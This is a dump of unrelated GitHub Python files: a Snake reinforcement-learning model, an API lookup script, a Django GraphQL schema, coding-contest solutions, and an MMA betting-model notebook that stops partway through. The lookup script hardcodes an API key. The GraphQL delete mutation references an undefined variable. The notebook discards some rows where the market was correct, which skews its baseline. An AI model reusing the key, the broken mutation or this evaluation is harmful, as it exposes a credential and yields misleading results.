use_scm_version=USE_SCM_VERSION,\n)\n","repo_name":"lemieuxbenedicte/xESMF","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"} +{"seq_id":"18342172732","text":"from collections import deque\nimport random\nimport torch\nimport torch.nn as nn\n\n\nclass ResNetBlock(nn.Module):\n \n def __init__(self, in_channels, out_channels):\n super().__init__()\n self.net = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1, stride=1),\n nn.ReLU(),\n nn.BatchNorm2d(out_channels),\n nn.Conv2d(out_channels, out_channels, kernel_size=3, padding=1, stride=1),\n nn.ReLU(),\n nn.BatchNorm2d(out_channels), \n )\n self.residual = nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1, stride=1)\n \n def forward(self, x):\n \n identity = self.residual(x)\n x2 = self.net(x)\n return identity + x2\n \nclass ResNetSnake(nn.Module):\n \n def __init__(self):\n super().__init__()\n \n self.net1 = 
ResNetBlock(1, 32)\n self.net2 = ResNetBlock(32, 64)\n self.net3 = ResNetBlock(64, 128)\n self.net4 = ResNetBlock(128, 256)\n self.maxpool = nn.MaxPool2d(2)\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Sequential(\n nn.Linear(260, 64), # 256 + 4: additional 4 is direction data\n nn.ReLU(),\n nn.Linear(64, 4) # 4: Number of actions\n )\n \n def forward(self, boards, directions):\n \n x = self.net1(boards)\n x = self.maxpool(x)\n x = self.net2(x)\n x = self.maxpool(x)\n x = self.net3(x)\n x = self.maxpool(x)\n x = self.net4(x)\n x = self.avgpool(x)\n x = torch.flatten(x, start_dim=1)\n x = torch.cat([x, directions], dim=1)\n \n return self.fc(x)\n\nclass SimpleFCSnake(nn.Module):\n \n def __init__(self):\n super().__init__()\n self.net = nn.Sequential(\n nn.Linear(28*28 + 4, 128),\n nn.ReLU(),\n nn.BatchNorm1d(128),\n nn.Linear(128, 64),\n nn.ReLU(),\n nn.BatchNorm1d(64),\n nn.Linear(64, 4)\n )\n \n def forward(self, boards, directions):\n \n board_flat = torch.flatten(boards, start_dim=1)\n x = torch.cat([board_flat, directions], dim=1)\n return self.net(x)\n \nclass SnakeAI():\n def __init__(self, device, model_class=ResNetSnake):\n self.device = device\n self.policy_net = model_class().to(device)\n self.target_net = model_class().to(device)\n self.target_net.load_state_dict(self.policy_net.state_dict())\n self.step = 0\n self.gamma = 0.95\n \n def get_Q(self, state, next_state):\n \n state_board, state_dir = state\n nstate_board, nstate_dir = next_state\n Q_curr = self.policy_net(state_board.to(self.device), state_dir.to(self.device))\n Q_next = self.target_net(nstate_board.to(self.device), nstate_dir.to(self.device))\n return Q_curr, Q_next\n\n def update_target_net(self):\n if self.step % 10 == 0:\n self.target_net.load_state_dict(self.policy_net.state_dict())\n \n def update_step(self):\n self.step += 1\n \n def save_policy_net(self, save_path):\n torch.save(self.policy_net.state_dict(), save_path)\n \n def load_policy_net(self, load_path):\n self.policy_net.load_state_dict(torch.load(load_path, map_location = self.device))\n \n def get_action(self, state, epsilon):\n \"\"\"\n Epsilon greedy action choice\n \n epsilon: float between 0 and 1, dictates how adventurous we should be.\n \"\"\"\n state_board, state_dir = state\n state_board = state_board.unsqueeze(0)\n state_dir = state_dir.unsqueeze(0)\n self.policy_net.eval()\n with torch.no_grad(): \n Q_curr = self.policy_net(state_board.to(self.device), state_dir.to(self.device))\n \n self.policy_net.train()\n random_value = torch.rand(1)\n return torch.randint(0, state_dir.shape[1], (1,)) if random_value < epsilon else Q_curr.argmax()\n \n \nclass ExperienceBuffer():\n \n def __init__(self, buffer_size):\n self.buffer = []\n self.buffer_size = buffer_size\n \n def collect(self, experience):\n self.buffer.append(experience)\n if len(self.buffer) > self.buffer_size:\n self.buffer.pop(0)\n \n def sample_from_experience(self, sample_size):\n if len(self.buffer) < sample_size:\n sample_size = len(self.buffer)\n \n sample = random.sample(self.buffer, sample_size)\n state_boards = torch.stack([exp[0][0] for exp in sample])\n # A one-hot vector denoting direction.\n state_dir = torch.stack([exp[0][1] for exp in sample])\n action = torch.FloatTensor([exp[1] for exp in sample])\n reward = torch.FloatTensor([exp[2] for exp in sample])\n nstate_boards = torch.stack([exp[3][0] for exp in sample])\n nstate_dir = torch.stack([exp[3][1] for exp in sample])\n\n return (state_boards, state_dir), action, reward, (nstate_boards, 
nstate_dir)\n\n\n\n ","repo_name":"SamuelVedrik/SnakeAIV2","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9804467696","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\n查询手机归属地,GET请求,JSON格式数据\nhttp://a.apix.cn/apixlife/phone/phone?phone=value\n'''\n\nimport requests\n\n# 接口地址\nurl = \"http://a.apix.cn/apixlife/phone/phone\"\n\n# 参数,手机号\nquerystring = {\"phone\": \"182xxxxxxx\"}\n\nheaders = {\n 'accept': \"application/json\",\n 'content-type': \"application/json\",\n 'apix-key': \"05928e129da74151614259915a63e5d6\" # 登录的apix-key\n }\n\nresponse = requests.request(\"GET\", url, headers=headers, params=querystring)\n\nprint(response.text)\n\n","repo_name":"fountainhead-gq/ArticleCatalog","sub_path":"PythonCoder/017_SearchMoblieHome.py","file_name":"017_SearchMoblieHome.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"71349382577","text":"\"\"\"create perf review\n\nRevision ID: 768fa5f35eaa\nRevises: 951bf251b2b3\nCreate Date: 2022-08-07 17:40:42.059608\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\nfrom sqlalchemy.dialects import postgresql\n\nfrom api.db.models import PerformanceReviewQualityType\n\n\n# revision identifiers, used by Alembic.\nrevision = '768fa5f35eaa'\ndown_revision = '951bf251b2b3'\nbranch_labels = None\ndepends_on = None\n\nREVIEW_QUALITY_TYPE_ENUM = postgresql.ENUM(\n PerformanceReviewQualityType,\n name=\"performance_review_quality_type\"\n)\n\n\ndef upgrade() -> None:\n op.create_table(\n \"performance_review\",\n sa.Column(\"id\", sa.String(20), primary_key=True),\n sa.Column(\"overall\", REVIEW_QUALITY_TYPE_ENUM),\n sa.Column(\"non_negotiables\", sa.SmallInteger),\n sa.Column(\"student_work_quality\", sa.SmallInteger),\n sa.Column(\"commentary\", sa.Text),\n sa.Column(\"created_at\", sa.DateTime, server_default=sa.func.current_timestamp()),\n sa.Column(\"teacher_id\", sa.String(20), sa.ForeignKey(\"teacher.id\")),\n sa.Column(\"assesser_id\", sa.String(20), sa.ForeignKey(\"teacher.id\"))\n )\n\n op.create_check_constraint(\n \"ck_performance_student_work_quality_less_than_or_equal_to_ten\",\n \"performance_review\",\n sa.column(\"student_work_quality\") <= 10\n )\n\n\ndef downgrade() -> None:\n op.drop_constraint(\"ck_performance_student_work_quality_less_than_or_equal_to_ten\", \"performance_review\")\n op.drop_table(\"performance_review\")\n\n REVIEW_QUALITY_TYPE_ENUM.drop(op.get_bind(), checkfirst=True)\n","repo_name":"getaddrinfo/tlda","sub_path":"api/migration/versions/768fa5f35eaa_create_perf_review.py","file_name":"768fa5f35eaa_create_perf_review.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"30104923980","text":"import collections\n\n\ndef main():\n n = int(input())\n B = [collections.deque() for _ in range(n)]\n\n Blis = []\n\n ans = 0\n\n for i in range(n):\n a, b = map(int, input().split())\n\n B[a - 1].append(b)\n for j in range(n):\n Blis += B[j]\n if len(Blis) == 0:\n print(ans)\n continue\n ans += max(Blis)\n Blis.remove(max(Blis))\n print(ans)\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"taichi6930/atcoder","sub_path":"_archive/past202004_f.py","file_name":"past202004_f.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"11808071149","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 31 11:45:15 2022\n\n@author: HAMZA\n\"\"\"\n\n\n\nimport numpy as np \nimport pandas as pd \nimport matplotlib.pyplot as plt\n\nimport warnings\n\nwarnings.filterwarnings('ignore')\n#%%\n# load data set\nx_l = np.load('X.npy')\nY_l = np.load('Y.npy')\nimg_size = 64\n\nplt.subplot(1, 2, 1)\nplt.imshow(x_l[260].reshape(img_size, img_size))\nplt.axis('off')\nplt.subplot(1, 2, 2)\nplt.imshow(x_l[900].reshape(img_size, img_size))\nplt.axis('off')\n\n\n\n\n\n\n\n#%%\n#'Also sign one is between indexes 822 and 1027. Number of one sign is 206. Therefore, we will use 205 samples from each classes(labels).\n\n\nX = np.concatenate((x_l[204:409], x_l[822:1027] ), axis=0) # from 0 to 204 is zero sign and from 205 to 410 is one sign \nz = np.zeros(205)\no = np.ones(205)\nY = np.concatenate((z, o), axis=0).reshape(X.shape[0],1)\nprint(\"X shape: \" , X.shape)\nprint(\"Y shape: \" , Y.shape)\n\n# Then lets create x_train, y_train, x_test, y_test arrays\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.15, random_state=42)\nnumber_of_train = X_train.shape[0]\nnumber_of_test = X_test.shape[0]\n\n#%%Now we have 3 dimensional input array (X) so we need to make it flatten (2D) in order to use as input for our first deep learning model.\n\nX_train_flatten = X_train.reshape(number_of_train,X_train.shape[1]*X_train.shape[2])\nX_test_flatten = X_test .reshape(number_of_test,X_test.shape[1]*X_test.shape[2])\nprint(\"X train flatten\",X_train_flatten.shape)\nprint(\"X test flatten\",X_test_flatten.shape)\n\n\n\nx_train = X_train_flatten.T\nx_test = X_test_flatten.T\ny_train = Y_train.T\ny_test = Y_test.T\nprint(\"x train: \",x_train.shape)\nprint(\"x test: \",x_test.shape)\nprint(\"y train: \",y_train.shape)\nprint(\"y test: \",y_test.shape)\n\n\n#%%\n\n#%%\n\n#%%\n\n#%%\n\n#%%\n\n#%%\n\n#%%\n\n\n\n\n\n\n\n\n\n","repo_name":"hamzamaral/deep-learning","sub_path":"logistic-regression.py","file_name":"logistic-regression.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"25733646948","text":"import graphene\nfrom .models import User, ImageUpload, UserProfile, UserAddress\nfrom graphene_django import DjangoObjectType\nfrom django.contrib.auth import authenticate\nfrom datetime import datetime\nfrom ecommerce_api.authentication import TokenManager\nfrom ecommerce_api.permissions import is_authenticated, paginate\nfrom graphene_file_upload.scalars import Upload\nfrom django.conf import settings\n\n\nclass UserType(DjangoObjectType):\n\n class Meta:\n model = User\n\n\nclass ImageUploadType(DjangoObjectType):\n image = graphene.String()\n\n class Meta:\n model = ImageUpload\n\n def resolve_image(self, info):\n if self.image:\n return \"{}{}{}\".format(settings.S3_BUCKET_URL, settings.MEDIA_URL, self.image)\n return None\n\n\nclass UserProfileType(DjangoObjectType):\n\n class Meta:\n model = UserProfile\n\n\nclass UserAddressType(DjangoObjectType):\n\n class Meta:\n model = UserAddress\n\n\nclass RegisterUser(graphene.Mutation):\n status = graphene.Boolean()\n message = graphene.String()\n\n class Arguments:\n email = 
graphene.String(required=True)\n password = graphene.String(required=True)\n first_name = graphene.String(required=True)\n last_name = graphene.String(required=True)\n\n def mutate(self, info, email, password, **kwargs):\n User.objects.create_user(email, password, **kwargs)\n\n return RegisterUser(\n status=True,\n message=\"User created successfully\"\n )\n\n\nclass LoginUser(graphene.Mutation):\n access = graphene.String()\n refresh = graphene.String()\n user = graphene.Field(UserType)\n\n class Arguments:\n email = graphene.String(required=True)\n password = graphene.String(required=True)\n\n def mutate(self, info, email, password):\n user = authenticate(username=email, password=password)\n\n if not user:\n raise Exception(\"invalid credentials\")\n\n user.last_login = datetime.now()\n user.save()\n\n access = TokenManager.get_access({\"user_id\": user.id})\n refresh = TokenManager.get_refresh({\"user_id\": user.id})\n\n return LoginUser(\n access=access,\n refresh=refresh,\n user=user\n )\n\n\nclass GetAccess(graphene.Mutation):\n access = graphene.String()\n\n class Arguments:\n refresh = graphene.String(required=True)\n\n def mutate(self, info, refresh):\n token = TokenManager.decode_token(refresh)\n\n if not token or token[\"type\"] != \"refresh\":\n raise Exception(\"Invalid token or has expired\")\n\n access = TokenManager.get_access({\"user_id\": token[\"user_id\"]})\n\n return GetAccess(\n access=access\n )\n\n\nclass ImageUploadMain(graphene.Mutation):\n image = graphene.Field(ImageUploadType)\n\n class Arguments:\n image = Upload(required=True)\n\n def mutate(self, info, image):\n image = ImageUpload.objects.create(image=image)\n\n return ImageUploadMain(\n image=image\n )\n\n\nclass UserProfileInput(graphene.InputObjectType):\n profile_picture = graphene.String()\n country_code = graphene.String()\n\n\nclass CreateUserProfile(graphene.Mutation):\n user_profile = graphene.Field(UserProfileType)\n\n class Arguments:\n profile_data = UserProfileInput()\n dob = graphene.Date(required=True)\n phone = graphene.Int(required=True)\n\n @is_authenticated\n def mutate(self, info, profile_data, **kwargs):\n user_profile = UserProfile.objects.create(\n user_id = info.context.user.id,\n **profile_data, **kwargs\n )\n\n return CreateUserProfile(\n user_profile=user_profile\n )\n\n\nclass UpdateUserProfile(graphene.Mutation):\n user_profile = graphene.Field(UserProfileType)\n\n class Arguments:\n profile_data = UserProfileInput()\n dob = graphene.Date()\n phone = graphene.Int()\n\n @is_authenticated\n def mutate(self, info, profile_data, **kwargs):\n try:\n info.context.user.user_profile\n except Exception:\n raise Exception(\"You don't have a profile to update\")\n\n UserProfile.objects.filter(user_id=info.context.user.id).update(**profile_data, **kwargs)\n\n return UpdateUserProfile(\n user_profile = info.context.user.user_profile\n )\n\n\nclass AddressInput(graphene.InputObjectType):\n street = graphene.String()\n city = graphene.String()\n state = graphene.String()\n country = graphene.String()\n\n\nclass CreateUserAddress(graphene.Mutation):\n address = graphene.Field(UserAddressType)\n\n class Arguments:\n address_data = AddressInput(required=True)\n is_default = graphene.Boolean()\n\n @is_authenticated\n def mutate(self, info, address_data, is_default=False):\n try:\n user_profile_id = info.context.user.user_profile.id\n except Exception:\n raise Exception(\"You need a profile to create an address\")\n\n existing_addresses = 
UserAddress.objects.filter(user_profile_id=user_profile_id)\n\n if is_default:\n existing_addresses.update(is_default=False)\n\n address = UserAddress.objects.create(\n user_profile_id=user_profile_id,\n is_default=is_default,\n **address_data\n )\n\n return CreateUserAddress(\n address=address\n )\n\n \nclass UpdateUserAddress(graphene.Mutation):\n address = graphene.Field(UserAddressType)\n\n class Arguments:\n address_data = AddressInput()\n is_default = graphene.Boolean()\n address_id = graphene.ID(required=True)\n\n @is_authenticated\n def mutate(self, info, address_data, address_id, is_default=False):\n profile_id = info.context.user.user_profile.id\n\n UserAddress.objects.filter(\n user_profile_id = profile_id,\n id=address_id\n ).update(is_default=is_default, **address_data)\n\n if is_default:\n UserAddress.objects.filter(\n user_profile_id=profile_id).exclude(id=address_id).update(is_default=False)\n\n return UpdateUserAddress(\n address = UserAddress.objects.get(id=address_id)\n )\n\n\nclass DeleteUserAddress(graphene.Mutation):\n status = graphene.Boolean()\n\n class Arguments:\n address_id = graphene.ID(required=True)\n\n @is_authenticated\n def mutate(self, info, address_id):\n UserAddress.objects.filter(\n user_profile_id = profile_id,\n id=address_id\n ).delete()\n\n return DeleteUserAddress(\n status=True\n )\n\n\nclass Query(graphene.ObjectType):\n users = graphene.Field(paginate(UserType), page=graphene.Int())\n image_uploads = graphene.Field(paginate(ImageUploadType), page=graphene.Int())\n me = graphene.Field(UserType)\n\n def resolve_users(self, info, **kwargs):\n return User.objects.filter(**kwargs)\n\n def resolve_image_uploads(self, info, **kwargs):\n return ImageUpload.objects.filter(**kwargs)\n\n @is_authenticated\n def resolve_me(self, info):\n return info.context.user\n\n\nclass Mutation(graphene.ObjectType):\n register_user = RegisterUser.Field()\n login_user = LoginUser.Field()\n get_access = GetAccess.Field()\n image_upload = ImageUploadMain.Field()\n create_user_profile = CreateUserProfile.Field()\n update_user_profile = UpdateUserProfile.Field()\n create_user_address = CreateUserAddress.Field()\n update_user_address = UpdateUserAddress.Field()\n delete_user_address = DeleteUserAddress.Field()\n\n\nschema = graphene.Schema(query=Query, mutation=Mutation)\n","repo_name":"adefemi/ecommerce-api","sub_path":"user_controller/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":7628,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"57"} +{"seq_id":"31814246823","text":"from typing import List\n\n\nclass Solution1:\n def make_square(self, matchsticks: List[int]) -> bool:\n def dfs(targets, idx):\n if idx == len(matchsticks):\n return True\n for i in range(4):\n if matchsticks[idx] <= targets[i]:\n targets[i] -= matchsticks[idx]\n if dfs(targets, idx+1):\n return True\n targets[i] += matchsticks[idx]\n return False\n\n stick_sum = sum(matchsticks)\n if stick_sum % 4:\n return False\n targets = [stick_sum // 4] * 4\n matchsticks.sort(reverse=True)\n return dfs(targets, 0)\n","repo_name":"YuhanShi53/Leetcode_Solutions","sub_path":"solutions/Leetcode_473/leetcode_473.py","file_name":"leetcode_473.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"5111606672","text":"import bisect\nfrom datetime import datetime\n\nfrom domain import Flight\n\nimport logger_instance\nfrom const import time_format, 
NUMBER_OF_SUCCESS_FLIGHTS_ALLOWED\n\n\ndef sort_flights_by_arrival(flights: list[Flight]):\n sorted_flights = sorted(flights, key=lambda f: f.arrival.strftime(time_format))\n return sorted_flights\n\n\ndef flight_duration_min(flight: Flight):\n arrival_dt = datetime.combine(datetime.min, flight.arrival)\n departure_dt = datetime.combine(datetime.min, flight.departure)\n\n diff_seconds = (departure_dt - arrival_dt).total_seconds()\n diff_minutes = diff_seconds / 60\n\n return diff_minutes\n\n\ndef remove_outdated_flights(exists_flights, flights_to_update):\n for flight in flights_to_update:\n exists_flights.remove(flight)\n\n\nclass SuccessFlightService:\n def __init__(self):\n self._successful_flights: list[Flight] = []\n\n def calculate_success_flights(self, flights: list[Flight]):\n logger_instance.logger.debug(\"calculating success flights...\")\n flights_to_update = []\n sorted_flights = sort_flights_by_arrival(flights)\n sorted_arrival_times = [flight.arrival for flight in self._successful_flights]\n\n for flight in sorted_flights:\n if flight_duration_min(flight) >= 180:\n\n if len(self._successful_flights) < NUMBER_OF_SUCCESS_FLIGHTS_ALLOWED:\n flight.success = 'success'\n self._successful_flights.append(flight)\n sorted_arrival_times = [flight.arrival for flight in self._successful_flights]\n else:\n expected_index_in_successful_flights = bisect.bisect_left(sorted_arrival_times, flight.arrival)\n\n if expected_index_in_successful_flights <= NUMBER_OF_SUCCESS_FLIGHTS_ALLOWED - 1:\n extracted_flight = self._successful_flights.pop()\n extracted_flight.success = 'fail'\n flights_to_update.append(extracted_flight)\n\n # keep the successful flight in the list with the size of NUMBER_OF_SUCCESS_FLIGHTS_ALLOWED\n self._successful_flights = self._successful_flights[:expected_index_in_successful_flights] + [\n flight] + self._successful_flights[expected_index_in_successful_flights:]\n\n flight.success = 'success'\n\n sorted_arrival_times = [flight.arrival for flight in self._successful_flights]\n else:\n flight.success = 'fail'\n else:\n flight.success = 'fail'\n logger_instance.logger.debug(\"calculated success flights done !\")\n return sorted_flights, flights_to_update\n","repo_name":"TomerArzu/success_flight","sub_path":"application/services/success_flight_service.py","file_name":"success_flight_service.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"18284474803","text":"# ---\n# jupyter:\n# jupytext:\n# notebook_metadata_filter: ploomber\n# text_representation:\n# extension: .py\n# format_name: percent\n# format_version: '1.3'\n# jupytext_version: 1.13.6\n# kernelspec:\n# display_name: Python 3 (ipykernel)\n# language: python\n# name: python3\n# ploomber:\n# injected_manually: true\n# ---\n\n# %% tags=[\"parameters\"]\n\nupstream = None\nproduct = None\ntarget = None\nrandom_seed = None\nvalidation_ratio = None\nodds_cols = None\n\n# %% tags=[\"injected-parameters\"]\n# Parameters\ntarget = [\"WINNER\"]\nodds_cols = [\"R_ODDS\", \"B_ODDS\"]\nrandom_seed = 1\ntest_ratio = 0.2\ninner_splits = 2\nouter_splits = 5\nupstream = {\n \"features\": {\n \"data\": \"/home/m/repo/mma/products/data/features.csv\",\n \"nb\": \"/home/m/repo/mma/products/reports/features.ipynb\",\n }\n}\nproduct = {\n \"nb\": \"/home/m/repo/mma/products/reports/nested_cv.ipynb\",\n \"model\": \"/home/m/repo/mma/products/models/nested_cv.pt\",\n}\n# %%\nimport os\nimport pickle\n\nimport matplotlib.pyplot as 
plt\n\nimport numpy as np\nimport pandas as pd\nimport sklearn\nfrom autosklearn.pipeline.components.data_preprocessing.balancing.balancing import Balancing\nfrom mlxtend.evaluate import accuracy_score\nfrom mlxtend.evaluate import confusion_matrix\nfrom mlxtend.plotting import plot_confusion_matrix\nfrom sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier, GradientBoostingClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import make_scorer, balanced_accuracy_score, log_loss\nimport random\nrandom.seed(random_seed)\n\n# %%\ncurrent_dir = os.path.abspath('')\nfig_dir = os.path.join(current_dir, '../fig')\nprint(\"fig_dir=\" + fig_dir)\n# %%\ndf = pd.read_csv(upstream['features']['data'])\nmarket = df[odds_cols]\nodds = market[['R_ODDS', 'B_ODDS']].values\nmarket_probs = sklearn.preprocessing.normalize(1 / odds, norm=\"l1\")\nmarket['p_red'] = market_probs[:,0]\nmarket['p_blue'] = market_probs[:,1]\nmarket['y_mkt'] = (market.p_red >= market.p_blue).astype(int)\ny = df[target]\nmarket['y_gt'] = y\n\n# D(P||Q) KL divergence, relative entropy of P, Q\ndef st_kl(R, Q):\n return (R[R>0] * np.log(R[R>0] / Q[R>0])).sum()\n\ndef st_kl_score(y_true, y_prob):\n # leave out zeros in y.\n kl_mean = st_kl(y_true, y_prob) / len(y_true[y_true == 1])\n return kl_mean\n\nst_kl_scorer = make_scorer(st_kl_score, needs_proba=True)\nlog_loss_scorer = make_scorer(log_loss, needs_proba=True)\n\n\nX_fund = df.drop(columns = target)\nif odds_cols in df.columns.tolist():\n X_fund = X_fund.drop(columns=odds_cols)\n\nif any(item in df.columns.tolist() for item in odds_cols):\n X_fund = X_fund.drop(columns=odds_cols)\n\n# X_fund['R_ODDS'] = market['R_ODDS']\n# X_fund['B_ODDS'] = market['B_ODDS']\n\nprint(X_fund.columns)\n\nprint(X_fund.head())\nprint(y.head())\n\nX = X_fund.values\ny = y.values.ravel()\n\n# %%\n# Market fix\nmkt_correct_idx = market[(market.y_mkt == market.y_gt)].index.to_list()\nremove = random.sample(mkt_correct_idx, int(len(mkt_correct_idx) * 0.08))\nmkt = market.drop(remove).reset_index(drop = True)\n\n# %%\n\nmarket_acc = []\nmarket_bacc = []\nmarket_kl = []\nmarket_cv = StratifiedKFold(n_splits=outer_splits, shuffle=True, random_state=1)\nfor train_index, test_index in market_cv.split(mkt.values, mkt.y_gt):\n fold = mkt.iloc[test_index, :]\n fold_acc = accuracy_score(fold.y_gt, fold.y_mkt)\n fold_bacc = balanced_accuracy_score(fold.y_gt, fold.y_mkt)\n\n y_true = fold.y_gt.values\n # p_market = fold[['p_red', 'p_blue']].values\n\n fold_kl = st_kl_score(y_true, fold['p_red'].values)\n market_acc.append(fold_acc)\n market_bacc.append(fold_bacc)\n market_kl.append(fold_kl)\n\n\nmarket_acc = np.array(market_acc)\nmarket_bacc = np.array(market_bacc)\nmarket_kl = np.array(market_kl)\n\nprint('\\n%s | outer ACC %.2f%% +/- %.2f' %\n (\"market\", market_acc.mean() * 100,\n market_acc.std() * 100))\n\nprint('\\n%s | outer B-ACC %.2f%% +/- %.2f' %\n (\"market\", market_bacc.mean() * 100,\n market_bacc.std() * 100))\n\nprint('\\n%s | outer KL %.2f +/- %.2f \\n' %\n (\"market\", 
market_kl.mean(),\n market_kl.std()))\n\n# prior\nprint(\"ground truth r_win, blue_win\")\ny_true = mkt.y_gt.values\nred_prior = y_true.sum() / len(y_true)\nblue_prior = 1 - red_prior\nprint(f\"GT red:{red_prior} blue:{blue_prior}\")\n\n# prior\nprint(\"market r_win, blue_win\")\ny_mkt = mkt.y_mkt.values\nred_prior_mkt = y_mkt.sum() / len(y_mkt)\nblue_prior_mkt = 1 - red_prior_mkt\nprint(f\"mkt red:{red_prior_mkt} blue:{blue_prior_mkt}\")\n\nconfmat = confusion_matrix(mkt.y_gt, mkt.y_mkt)\nfig, ax = plot_confusion_matrix(conf_mat=confmat,\n show_absolute=False,\n show_normed=True,\n # class_names = [1,0],\n figsize=(4, 4))\n\nfig.tight_layout()\nfig.savefig(fig_dir + '/confmat_bin.eps', bbox_inches='tight', pad_inches=0)\nplt.show()\n\n# %%\nX = X.astype(np.float32)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y,\n test_size=test_ratio,\n random_state=random_seed,\n stratify=y)\n\n# Initializing Classifiers\nclf1 = LogisticRegression(multi_class='multinomial',\n solver='newton-cg',\n random_state=1)\nclf2 = KNeighborsClassifier(algorithm='ball_tree',\n leaf_size=50)\nclf3 = DecisionTreeClassifier(random_state=1)\nclf4 = SVC(random_state=1)\nclf5 = RandomForestClassifier(random_state=1)\nclf6 = ExtraTreesClassifier(random_state=1)\n\nclf8 = MLPClassifier(max_iter=10000,random_state=1)\n\nclf9 = GradientBoostingClassifier(random_state=1)\n\n# Building the pipelines\npipe1 = Pipeline([('std', StandardScaler()),\n ('clf1', clf1)])\n\npipe2 = Pipeline([('std', StandardScaler()),\n ('clf2', clf2)])\n\npipe3 = Pipeline([('balancing', Balancing(random_state=1, strategy='weighting')),\n ('clf3', clf3)])\n\npipe4 = Pipeline([('std', StandardScaler()),\n ('clf4', clf4)])\n\npipe5 = Pipeline([('balancing', Balancing(random_state=1, strategy='weighting')),\n ('clf5', clf5)])\n\npipe6 = Pipeline([('balancing', Balancing(random_state=1, strategy='weighting')),\n ('clf6', clf6)])\n\npipe8 = Pipeline([('balancing', Balancing(random_state=1, strategy='weighting')),\n ('std', StandardScaler()),\n ('clf8', clf8)])\n\npipe9 = Pipeline([('balancing', Balancing(random_state=1, strategy='weighting')),\n ('clf9', clf9)])\n\n# Setting up the parameter grids\ngrid1 = [{'clf1__penalty': ['l2', 'l1'],\n 'clf1__C': np.power(10., np.arange(-4, 4))}]\n\ngrid2 = [{'clf2__n_neighbors': list(range(1, 100)),\n 'clf2__p': [1, 2, 3, 4, 5]}]\n\ngrid3 = [{'clf3__max_depth': list(range(1, 50)) + [None],\n 'clf3__criterion': ['gini', 'entropy']}]\n\ngrid4 = [{'clf4__kernel': ['rbf', 'poly'],\n 'clf4__C': np.power(10., np.arange(-4, 4)),\n 'clf4__gamma': np.power(10., np.arange(-5, 0))}\n ]\n\ngrid5 = [{'clf5__n_estimators': [100, 500, 1000, 5000]}]\n\n\ngrid6 = [{'clf6__n_estimators': [500, 1000],\n 'clf6__criterion': ['gini', 'entropy'],\n # 'clf6__min_samples_leaf': param_range,\n # 'clf6__max_depth': param_range,\n # 'clf6__min_samples_split': param_range[1:]\n }]\n\n# grid8 = [{\n# 'clf8__hidden_layer_sizes': [(30,), (68,), (100,), (1000,), (200,), (100, 50), (100, 100),(1000, 2), (1000, 10), (50,100,50)],\n# 'clf8__activation': ['tanh', 'relu'],\n# 'clf8__solver': ['sgd', 'adam'],\n# 'clf8__alpha': [0.0001, 0.05, 0.00047],\n# 'clf8__batch_size': ['auto'],\n# 'clf8__early_stopping': [True],\n# 'clf8__learning_rate': ['adaptive'],\n# }]\n\ngrid8 = [{\n 'clf8__hidden_layer_sizes': [(256,), (500,), (1000,), (500,2)],\n 'clf8__activation': ['tanh', 'relu'],\n 'clf8__solver': ['sgd', 'adam'],\n 'clf8__alpha': [0.0001, 0.05, 0.00047],\n 'clf8__batch_size': ['auto'],\n 'clf8__early_stopping': [True],\n 
